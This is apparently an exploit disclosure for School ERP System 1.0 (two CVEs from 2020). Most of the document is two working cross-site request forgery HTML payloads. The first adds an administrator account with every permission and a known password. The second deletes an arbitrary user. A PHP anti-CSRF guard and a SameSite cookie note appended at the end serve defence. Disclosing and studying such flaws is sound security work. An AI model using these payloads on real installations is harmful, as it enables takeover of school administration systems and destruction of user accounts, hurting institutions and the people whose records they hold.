School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
# Title: School ERP System 1.0 - Cross Site Request Forgery (Add Admin)
# Date: 2020-01-31
# Exploit Author: J3rryBl4nks
# Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/
# Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/
# Version ERP-Ultimate
# CVE: CVE-2020-8504,CVE-2020-8505
# Tested on Windows 10/Kali Rolling

# The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery
# that leads to admin account creation and arbitrary user deletion.

# Proof of Concept for the Admin Account Creation:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://SITEHERE/office_admin/?pid=42&action=addadmin" method="POST">
      <input type="hidden" name="admin_fname" value="Admin" />
      <input type="hidden" name="admin_lname" value="Tester" />
      <input type="hidden" name="admin_username" value="testing" />
      <input type="hidden" name="admin_password" value="testing123" />
      <input type="hidden" name="admin_password2" value="testing123" />
      <input type="hidden" name="admin_email" value="test@test.com" />
      <input type="hidden" name="admin_phoneno" value="9999999999" />
      <input type="hidden" name="adminlevel" value="" />
      <input type="hidden" name="admin_more" value="Test" />
<input type="hidden" name="1_p" value="1_p" /> <input type="hidden" name="1_1" value="1_1" /> <input type="hidden" name="1_2" value="1_2" /> <input type="hidden" name="1_4" value="1_4" /> <input type="hidden" name="1_3" value="1_3" /> <input type="hidden" name="2_p" value="2_p" /> <input type="hidden" name="2_1" value="2_1" /> <input type="hidden" name="2_2" value="2_2" /> <input type="hidden" name="2_3" value="2_3" /> <input type="hidden" name="2_4" value="2_4" /> <input type="hidden" name="2_5" value="2_5" /> <input type="hidden" name="2_6" value="2_6" /> <input type="hidden" name="2_7" value="2_7" /> <input type="hidden" name="2_8" value="2_8" /> <input type="hidden" name="2_9" value="2_9" /> <input type="hidden" 
name="2_10" value="2_10" /> <input type="hidden" name="2_11" value="2_11" /> <input type="hidden" name="2_12" value="2_12" /> <input type="hidden" name="2_13" value="2_13" /> <input type="hidden" name="2_14" value="2_14" /> <input type="hidden" name="2_15" value="2_15" /> <input type="hidden" name="2_20" value="2_20" /> <input type="hidden" name="2_18" value="2_18" /> <input type="hidden" name="2_19" value="2_19" /> <input type="hidden" name="3_p" value="3_p" /> <input type="hidden" name="3_1" value="3_1" /> <input type="hidden" name="3_2" value="3_2" /> <input type="hidden" name="3_3" value="3_3" /> <input type="hidden" name="3_5" value="3_5" /> <input type="hidden" name="3_4" value="3_4" /> <input type="hidden" name="4_p" value="4_p" /> <input type="hidden" name="5_p" value="5_p" /> <input type="hidden" name="5_1" value="5_1" /> <input type="hidden" name="5_3" value="5_3" /> <input type="hidden" name="5_2" value="5_2" /> <input type="hidden" name="5_5" value="5_5" /> <input type="hidden" name="5_6" value="5_6" /> <input type="hidden" name="6_p" value="6_p" /> <input type="hidden" name="7_p" value="7_p" /> <input type="hidden" name="7_1" value="7_1" /> <input type="hidden" name="7_2" value="7_2" /> <input type="hidden" name="7_3" value="7_3" /> <input type="hidden" name="7_4" value="7_4" /> <input type="hidden" name="7_5" value="7_5" /> <input type="hidden" name="8_p" value="8_p" /> <input type="hidden" name="8_1" value="8_1" /> <input type="hidden" name="8_2" value="8_2" /> <input type="hidden" name="8_3" value="8_3" /> <input type="hidden" name="8_101" value="8_101" /> <input type="hidden" name="8_4" value="8_4" /> <input type="hidden" name="8_5" value="8_5" /> <input type="hidden" name="8_6" value="8_6" /> <input type="hidden" name="8_16" value="8_16" /> <input type="hidden" name="8_102" value="8_102" /> <input type="hidden" name="8_7" value="8_7" /> <input type="hidden" name="8_8" value="8_8" /> <input type="hidden" name="8_9" value="8_9" /> <input 
type="hidden" name="8_17" value="8_17" /> <input type="hidden" name="8_103" value="8_103" /> <input type="hidden" name="8_104" value="8_104" /> <input type="hidden" name="8_10" value="8_10" /> <input type="hidden" name="8_11" value="8_11" /> <input type="hidden" name="8_12" value="8_12" /> <input type="hidden" name="8_18" value="8_18" /> <input type="hidden" name="8_105" value="8_105" /> <input type="hidden" name="8_106" value="8_106" /> <input type="hidden" name="8_13" value="8_13" /> <input type="hidden" name="8_14" value="8_14" /> <input type="hidden" name="8_15" value="8_15" /> <input type="hidden" name="8_19" value="8_19" /> <input type="hidden" name="8_107" value="8_107" /> <input type="hidden" name="8_108" value="8_108" /> <input type="hidden" name="9_p" value="9_p" /> <input type="hidden" name="9_1" value="9_1" /> <input type="hidden" name="9_17" value="9_17" /> <input type="hidden" name="9_18" value="9_18" /> <input type="hidden" name="9_19" value="9_19" /> <input type="hidden" name="9_2" value="9_2" /> <input type="hidden" name="9_20" value="9_20" /> <input type="hidden" name="9_21" value="9_21" /> <input type="hidden" name="9_22" value="9_22" /> <input type="hidden" name="9_3" value="9_3" /> <input type="hidden" name="9_4" value="9_4" /> <input type="hidden" name="9_5" value="9_5" /> <input type="hidden" name="9_6" value="9_6" /> <input type="hidden" name="9_101" value="9_101" /> <input type="hidden" name="9_7" value="9_7" /> <input type="hidden" name="9_102" value="9_102" /> <input type="hidden" name="9_8" value="9_8" /> <input type="hidden" name="9_103" value="9_103" /> <input type="hidden" name="9_24" value="9_24" /> <input type="hidden" name="9_25" value="9_25" /> <input type="hidden" name="9_33" value="9_33" /> <input type="hidden" name="9_23" value="9_23" /> <input type="hidden" name="9_11" value="9_11" /> <input type="hidden" name="9_13" value="9_13" /> <input type="hidden" name="9_27" value="9_27" /> <input type="hidden" name="9_14" value="9_14" 
/> <input type="hidden" name="9_29" value="9_29" /> <input type="hidden" name="9_30" value="9_30" /> <input type="hidden" name="9_31" value="9_31" /> <input type="hidden" name="9_15" value="9_15" /> <input type="hidden" name="9_16" value="9_16" /> <input type="hidden" name="9_32" value="9_32" /> <input type="hidden" name="10_p" value="10_p" /> <input type="hidden" name="10_1" value="10_1" /> <input type="hidden" name="10_2" value="10_2" /> <input type="hidden" name="10_3" value="10_3" /> <input type="hidden" name="10_4" value="10_4" /> <input type="hidden" name="10_5" value="10_5" /> <input type="hidden" name="10_6" value="10_6" /> <input type="hidden" name="10_7" value="10_7" /> <input type="hidden" name="10_8" value="10_8" /> <input type="hidden" name="10_11" value="10_11" /> <input type="hidden" name="10_9" value="10_9" /> <input type="hidden" name="10_10" value="10_10" /> <input type="hidden" name="10_12" value="10_12" /> <input type="hidden" name="11_p" value="11_p" /> <input type="hidden" name="11_1" value="11_1" /> <input type="hidden" name="11_2" value="11_2" /> <input type="hidden" name="11_3" value="11_3" /> <input type="hidden" name="11_4" value="11_4" /> <input type="hidden" name="11_5" value="11_5" /> <input type="hidden" name="11_6" value="11_6" /> <input type="hidden" name="11_7" value="11_7" /> <input type="hidden" name="11_8" value="11_8" /> <input type="hidden" name="11_9" value="11_9" /> <input type="hidden" name="11_10" value="11_10" /> <input type="hidden" name="11_11" value="11_11" /> <input type="hidden" name="11_12" value="11_12" /> <input type="hidden" name="11_13" value="11_13" /> <input type="hidden" name="11_14" value="11_14" /> <input type="hidden" name="11_15" value="11_15" /> <input type="hidden" name="11_16" value="11_16" /> <input type="hidden" name="11_17" value="11_17" /> <input type="hidden" name="11_18" value="11_18" /> <input type="hidden" name="11_19" value="11_19" /> <input type="hidden" name="11_20" value="11_20" /> <input 
type="hidden" name="11_21" value="11_21" /> <input type="hidden" name="11_23" value="11_23" /> <input type="hidden" name="11_101" value="11_101" /> <input type="hidden" name="11_102" value="11_102" /> <input type="hidden" name="11_22" value="11_22" /> <input type="hidden" name="11_103" value="11_103" /> <input type="hidden" name="11_104" value="11_104" /> <input type="hidden" name="12_p" value="12_p" /> <input type="hidden" name="12_1" value="12_1" /> <input type="hidden" name="12_2" value="12_2" /> <input type="hidden" name="12_3" value="12_3" /> <input type="hidden" name="12_4" value="12_4" /> <input type="hidden" name="12_5" value="12_5" /> <input type="hidden" name="12_11" value="12_11" /> <input type="hidden" name="12_6" value="12_6" /> <input type="hidden" name="12_7" value="12_7" /> <input type="hidden" name="12_8" value="12_8" /> <input type="hidden" name="12_12" value="12_12" /> <input type="hidden" name="12_9" value="12_9" /> <input type="hidden" name="12_10" value="12_10" /> <input type="hidden" name="13_p" value="13_p" /> <input type="hidden" name="13_1" value="13_1" /> <input type="hidden" name="13_2" value="13_2" /> <input type="hidden" name="13_3" value="13_3" /> <input type="hidden" name="13_17" value="13_17" /> <input type="hidden" name="13_4" value="13_4" /> <input type="hidden" name="13_5" value="13_5" /> <input type="hidden" name="13_6" value="13_6" /> <input type="hidden" name="13_18" value="13_18" /> <input type="hidden" name="13_7" value="13_7" /> <input type="hidden" name="13_8" value="13_8" /> <input type="hidden" name="13_9" value="13_9" /> <input type="hidden" name="13_19" value="13_19" /> <input type="hidden" name="13_20" value="13_20" /> <input type="hidden" name="13_10" value="13_10" /> <input type="hidden" name="13_11" value="13_11" /> <input type="hidden" name="13_12" value="13_12" /> <input type="hidden" name="13_21" value="13_21" /> <input type="hidden" name="13_22" value="13_22" /> <input type="hidden" name="13_13" value="13_13" 
/> <input type="hidden" name="13_14" value="13_14" /> <input type="hidden" name="13_15" value="13_15" /> <input type="hidden" name="13_16" value="13_16" /> <input type="hidden" name="13_108" value="13_108" /> <input type="hidden" name="13_23" value="13_23" /> <input type="hidden" name="13_101" value="13_101" /> <input type="hidden" name="13_102" value="13_102" /> <input type="hidden" name="13_103" value="13_103" /> <input type="hidden" name="13_104" value="13_104" /> <input type="hidden" name="13_106" value="13_106" /> <input type="hidden" name="13_105" value="13_105" /> <input type="hidden" name="14_p" value="14_p" /> <input type="hidden" name="14_1" value="14_1" /> <input type="hidden" name="14_2" value="14_2" /> <input type="hidden" name="14_3" value="14_3" /> <input type="hidden" name="14_101" value="14_101" /> <input type="hidden" name="14_4" value="14_4" /> <input type="hidden" name="14_5" value="14_5" /> <input type="hidden" name="14_6" value="14_6" /> <input type="hidden" name="14_102" value="14_102" /> <input type="hidden" name="14_7" value="14_7" /> <input type="hidden" name="14_8" value="14_8" /> <input type="hidden" name="14_9" value="14_9" /> <input type="hidden" name="14_103" value="14_103" /> <input type="hidden" name="14_10" value="14_10" /> <input type="hidden" name="14_21" value="14_21" /> <input type="hidden" name="14_104" value="14_104" /> <input type="hidden" name="14_11" value="14_11" /> <input type="hidden" name="14_105" value="14_105" /> <input type="hidden" name="14_12" value="14_12" /> <input type="hidden" name="14_106" value="14_106" /> <input type="hidden" name="14_13" value="14_13" /> <input type="hidden" name="14_14" value="14_14" /> <input type="hidden" name="14_15" value="14_15" /> <input type="hidden" name="14_16" value="14_16" /> <input type="hidden" name="14_107" value="14_107" /> <input type="hidden" name="14_17" value="14_17" /> <input type="hidden" name="14_18" value="14_18" /> <input type="hidden" name="14_19" value="14_19" /> 
<input type="hidden" name="14_20" value="14_20" /> <input type="hidden" name="15_p" value="15_p" /> <input type="hidden" name="15_1" value="15_1" /> <input type="hidden" name="15_2" value="15_2" /> <input type="hidden" name="15_3" value="15_3" /> <input type="hidden" name="16_p" value="16_p" /> <input type="hidden" name="16_1" value="16_1" /> <input type="hidden" name="16_2" value="16_2" /> <input type="hidden" name="16_3" value="16_3" /> <input type="hidden" name="16_101" value="16_101" /> <input type="hidden" name="16_4" value="16_4" /> <input type="hidden" name="16_5" value="16_5" /> <input type="hidden" name="16_6" value="16_6" /> <input type="hidden" name="16_102" value="16_102" /> <input type="hidden" name="16_7" value="16_7" /> <input type="hidden" name="16_8" value="16_8" /> <input type="hidden" name="16_10" value="16_10" /> <input type="hidden" name="16_11" value="16_11" /> <input type="hidden" name="16_12" value="16_12" /> <input type="hidden" name="16_103" value="16_103" /> <input type="hidden" name="16_13" value="16_13" /> <input type="hidden" name="16_14" value="16_14" /> <input type="hidden" name="16_15" value="16_15" /> <input type="hidden" name="16_17" value="16_17" /> <input type="hidden" name="16_18" value="16_18" /> <input type="hidden" name="16_20" value="16_20" /> <input type="hidden" name="16_21" value="16_21" /> <input type="hidden" name="16_24" value="16_24" /> <input type="hidden" name="16_104" value="16_104" /> <input type="hidden" name="16_105" value="16_105" /> <input type="hidden" name="16_22" value="16_22" /> <input type="hidden" name="16_25" value="16_25" /> <input type="hidden" name="16_23" value="16_23" /> <input type="hidden" name="16_26" value="16_26" /> <input type="hidden" name="16_106" value="16_106" /> <input type="hidden" name="16_107" value="16_107" /> <input type="hidden" name="16_27" value="16_27" /> <input type="hidden" name="16_28" value="16_28" /> <input type="hidden" name="16_29" value="16_29" /> <input type="hidden" 
name="17_p" value="17_p" /> <input type="hidden" name="17_1" value="17_1" /> <input type="hidden" name="17_6" value="17_6" /> <input type="hidden" name="17_2" value="17_2" /> <input type="hidden" name="17_3" value="17_3" /> <input type="hidden" name="17_101" value="17_101" /> <input type="hidden" name="17_4" value="17_4" /> <input type="hidden" name="17_5" value="17_5" /> <input type="hidden" name="17_7" value="17_7" /> <input type="hidden" name="17_8" value="17_8" /> <input type="hidden" name="17_9" value="17_9" /> <input type="hidden" name="18_p" value="18_p" /> <input type="hidden" name="18_5" value="18_5" /> <input type="hidden" name="18_1" value="18_1" /> <input type="hidden" name="18_2" value="18_2" /> <input type="hidden" name="18_3" value="18_3" /> <input type="hidden" name="18_4" value="18_4" /> <input type="hidden" name="18_6" value="18_6" /> <input type="hidden" name="18_7" value="18_7" /> <input type="hidden" name="18_8" value="18_8" /> <input type="hidden" name="18_9" value="18_9" /> <input type="hidden" name="18_10" value="18_10" /> <input type="hidden" name="18_11" value="18_11" /> <input type="hidden" name="18_12" value="18_12" /> <input type="hidden" name="19_p" value="19_p" /> <input type="hidden" name="19_1" value="19_1" /> <input type="hidden" name="19_2" value="19_2" /> <input type="hidden" name="19_3" value="19_3" /> <input type="hidden" name="19_4" value="19_4" /> <input type="hidden" name="19_5" value="19_5" /> <input type="hidden" name="19_6" value="19_6" /> <input type="hidden" name="19_11" value="19_11" /> <input type="hidden" name="19_7" value="19_7" /> <input type="hidden" name="19_12" value="19_12" /> <input type="hidden" name="19_13" value="19_13" /> <input type="hidden" name="19_14" value="19_14" /> <input type="hidden" name="19_15" value="19_15" /> <input type="hidden" name="19_101" value="19_101" /> <input type="hidden" name="19_102" value="19_102" /> <input type="hidden" name="19_8" value="19_8" /> <input type="hidden" 
name="19_16" value="19_16" /> <input type="hidden" name="19_9" value="19_9" /> <input type="hidden" name="19_10" value="19_10" /> <input type="hidden" name="19_17" value="19_17" /> <input type="hidden" name="19_18" value="19_18" /> <input type="hidden" name="20_p" value="20_p" /> <input type="hidden" name="20_1" value="20_1" /> <input type="hidden" name="20_5" value="20_5" /> <input type="hidden" name="20_101" value="20_101" /> <input type="hidden" name="20_2" value="20_2" /> <input type="hidden" name="20_6" value="20_6" /> <input type="hidden" name="20_102" value="20_102" /> <input type="hidden" name="20_3" value="20_3" /> <input type="hidden" name="20_4" value="20_4" /> <input type="hidden" name="21_p" value="21_p" /> <input type="hidden" name="21_1" value="21_1" /> <input type="hidden" name="21_2" value="21_2" /> <input type="hidden" name="21_3" value="21_3" /> <input type="hidden" name="22_p" value="22_p" /> <input type="hidden" name="22_1" value="22_1" /> <input type="hidden" name="22_2" value="22_2" /> <input type="hidden" name="22_3" value="22_3" /> <input type="hidden" name="22_5" value="22_5" /> <input type="hidden" name="22_4" value="22_4" /> <input type="hidden" name="22_6" value="22_6" /> <input type="hidden" name="23_p" value="23_p" /> <input type="hidden" name="24_p" value="24_p" /> <input type="hidden" name="24_1" value="24_1" /> <input type="hidden" name="24_2" value="24_2" /> <input type="hidden" name="24_3" value="24_3" /> <input type="hidden" name="24_4" value="24_4" /> <input type="hidden" name="25_p" value="25_p" /> <input type="hidden" name="25_1" value="25_1" /> <input type="hidden" name="25_2" value="25_2" /> <input type="hidden" name="25_5" value="25_5" /> <input type="hidden" name="25_6" value="25_6" /> <input type="hidden" name="25_3" value="25_3" /> <input type="hidden" name="25_4" value="25_4" /> <input type="hidden" name="25_7" value="25_7" /> <input type="hidden" name="25_8" value="25_8" /> <input type="hidden" name="26_p" 
value="26_p" /> <input type="hidden" name="26_1" value="26_1" /> <input type="hidden" name="26_2" value="26_2" /> <input type="hidden" name="27_p" value="27_p" /> <input type="hidden" name="27_1" value="27_1" /> <input type="hidden" name="27_2" value="27_2" /> <input type="hidden" name="27_3" value="27_3" /> <input type="hidden" name="28_p" value="28_p" /> <input type="hidden" name="28_1" value="28_1" /> <input type="hidden" name="28_2" value="28_2" /> <input type="hidden" name="28_3" value="28_3" /> <input type="hidden" name="28_4" value="28_4" /> <input type="hidden" name="28_5" value="28_5" /> <input type="hidden" name="29_p" value="29_p" /> <input type="hidden" name="29_1" value="29_1" /> <input type="hidden" name="29_2" value="29_2" /> <input type="hidden" name="30_p" value="30_p" /> <input type="hidden" name="30_1" value="30_1" /> <input type="hidden" name="30_2" value="30_2" /> <input type="hidden" name="30_3" value="30_3" /> <input type="hidden" name="30_4" value="30_4" /> <input type="hidden" name="30_5" value="30_5" /> <input type="hidden" name="30_6" value="30_6" /> <input type="hidden" name="30_7" value="30_7" /> <input type="hidden" name="30_8" value="30_8" /> <input type="hidden" name="31_p" value="31_p" /> <input type="hidden" name="31_1" value="31_1" /> <input type="hidden" name="31_2" value="31_2" /> <input type="hidden" name="31_3" value="31_3" /> <input type="hidden" name="31_5" value="31_5" /> <input type="hidden" name="31_4" value="31_4" /> <input type="hidden" name="32_p" value="32_p" /> <input type="hidden" name="32_3" value="32_3" /> <input type="hidden" name="32_1" value="32_1" /> <input type="hidden" name="32_4" value="32_4" /> <input type="hidden" name="32_2" value="32_2" /> <input type="hidden" name="32_5" value="32_5" /> <input type="hidden" name="33_p" value="33_p" /> <input type="hidden" name="33_1" value="33_1" /> <input type="hidden" name="33_2" value="33_2" /> <input type="hidden" name="33_3" value="33_3" /> <input type="hidden" 
name="33_8" value="33_8" /> <input type="hidden" name="33_4" value="33_4" /> <input type="hidden" name="33_5" value="33_5" /> <input type="hidden" name="33_6" value="33_6" /> <input type="hidden" name="33_7" value="33_7" /> <input type="hidden" name="34_p" value="34_p" /> <input type="hidden" name="34_1" value="34_1" /> <input type="hidden" name="34_2" value="34_2" /> <input type="hidden" name="35_p" value="35_p" /> <input type="hidden" name="35_1" value="35_1" /> <input type="hidden" name="35_2" value="35_2" /> <input type="hidden" name="35_3" value="35_3" />
      <input type="hidden" name="saveallowance" value="Submit" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Proof of Concept for the arbitrary user deletion:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://SITEHERE/office_admin/">
      <input type="hidden" name="pid" value="42" />
      <input type="hidden" name="action" value="deleteadmin" />
      <input type="hidden" name="lid" value="90" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
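
Both requests above succeed because the server accepts them on the session cookie alone. The following server-side guard is an added example, not code from School ERP or from the exploit author; the `csrf_token` field name, the `erp.example` origin and the request-array shape are assumptions, and only the `addadmin` and `deleteadmin` action names come from the PoCs.

```php
<?php
// Added example, not School ERP code: guard for state-changing admin actions.
// In the application, $req would be built from $_SERVER['REQUEST_METHOD'],
// $_GET['action'], $_SERVER['HTTP_ORIGIN'] ?? null and $_POST['csrf_token'] ?? null.

const STATE_CHANGING = ['addadmin', 'deleteadmin']; // action names from the PoCs

/** Create (once per session) and return the per-session anti-CSRF token. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Return null when the request may proceed, otherwise the rejection reason. */
function csrf_reject_reason(array $req, array $session, string $siteOrigin): ?string
{
    if (!in_array($req['action'], STATE_CHANGING, true)) {
        return null; // read-only pages are not guarded here
    }
    if ($req['method'] !== 'POST') {
        return 'state change over ' . $req['method'];
    }
    if ($req['origin'] !== null && $req['origin'] !== $siteOrigin) {
        return 'cross-origin request from ' . $req['origin'];
    }
    $expected = $session['csrf_token'] ?? '';
    $given = $req['token'] ?? '';
    if ($expected === '' || !is_string($given) || !hash_equals($expected, $given)) {
        return 'missing or wrong CSRF token';
    }
    return null;
}

// Constructed requests shaped like the two PoCs, plus one legitimate submission.
$site = 'https://erp.example';   // placeholder origin (assumption)
$session = [];                   // stands in for $_SESSION
$token = csrf_token($session);   // value the real form would embed as a hidden field

$requests = [
    'add-admin PoC (cross-site POST, no token)' =>
        ['method' => 'POST', 'action' => 'addadmin',
         'origin' => 'https://other.example', 'token' => null],
    'delete PoC (form has no method, so GET)' =>
        ['method' => 'GET', 'action' => 'deleteadmin',
         'origin' => null, 'token' => null],
    'same-site form carrying the token' =>
        ['method' => 'POST', 'action' => 'addadmin',
         'origin' => $site, 'token' => $token],
];

foreach ($requests as $label => $req) {
    $reason = csrf_reject_reason($req, $session, $site);
    echo $label . ': ' . ($reason === null ? 'allowed' : 'rejected, ' . $reason) . PHP_EOL;
}
```

Setting `SameSite=Lax` on the session cookie stops the cross-site POST but not the GET-based delete, because top-level GET navigations still send Lax cookies; the method check is what closes that path.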